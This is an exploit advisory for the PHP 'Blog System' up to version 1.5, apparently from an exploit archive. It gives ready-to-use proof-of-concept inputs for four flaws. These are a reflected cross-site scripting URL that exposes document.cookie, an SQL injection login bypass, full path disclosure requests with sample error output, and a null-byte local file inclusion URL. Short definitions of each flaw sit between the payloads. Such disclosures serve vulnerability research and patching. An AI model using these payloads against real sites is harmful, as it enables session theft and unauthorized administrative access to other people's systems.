# Exploit Title: Blog System <= 1.5 Multiple Vulnerabilities # Date: 04/04/10 # Author: cp77fk4r | empty0page[SHIFT+2]gmail.com | www.DigitalWhisper.co.il # Software Link: http://www.netartmedia.net/blogsystem/ | http://www.netartmedia.net/blogsystem/demo.html # Version: <= 1.5 # Tested on: PHP # ##[Cross Site Scripting]* (Cross-Site Scripting attacks are a type of injection problem, in which malicious scripts are injected into the otherwise benign and trusted web sites. Cross-site scripting (XSS) attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user. Flaws that allow these attacks to succeed are quite widespread and occur anywhere a web application uses input from a user in the output it generates without validating or encoding it) http://[SERVER]/ADMIN/index.php?category=(home|comments|lists|habillage|info)&action=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E # # ##[SQL Injection] (A SQL injection attack consists of insertion or "injection" of a SQL query via the input data from the client to the application. A successful SQL injection exploit can read sensitive data from the database, modify database data (Insert/Update/Delete), execute administration operations on the database (such as shutdown the DBMS), recover the content of a given file present on the DBMS file system and in some cases issue commands to the operating system. SQL injection attacks are a type of injection attack, in which SQL commands are injected into data-plane input in order to effect the execution of predefined SQL commands.) # http://[SERVER]/index.php # i.e.: # User: admin Pass: ' or ''=' # # ##[FULL PATH DICSLOSURE]** (Full Path Disclosure (FPD) vulnerabilities enable the attacker to see the path to the webroot/file. e.g.: /home/omg/htdocs/file/. Certain vulnerabilities, such as using the load_file() (within a SQL Injection) query to view the page source, require the attacker to have the full path to the file they wish to view. (OWASP)) # The following pages require files without checking if they exist. loading them will return a Fatal Errors and Warnings ("No such file or directory") with includes their Full-Path: # http://[SERVER]/ADMIN/index.php?category=(home|comments|lists|habillage|info)&action=cP # Will returne: # Warning: include(home/cP.php) [function.include]: failed to open stream: No such file or directory in [FPD] on line 332 Warning: include(home/cP.php) [function.include]: failed to open stream: No such file or directory in [FPD] on line 332 Warning: include() [function.include]: Failed opening 'home/pa.php' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in [FPD] on line 332 # # http://[SERVER]/blog.php?user=admin&month2=4&year2=aaaaaaaaaaaaa # Will Returne: # Warning: mktime() expects parameter 6 to be long, string given in [FPD] on line 179 Warning: mktime() expects parameter 6 to be long, string given in [FPD] on line 180 # # ##[LOCAL FILE INCLUSION]** http://[SERVER]/ADMIN/index.php?category=(home|comments|lists|habillage|info)&action=[LFI]%00 # # *The victim must be logged in. **The attacker must be logged in. # # [e0f]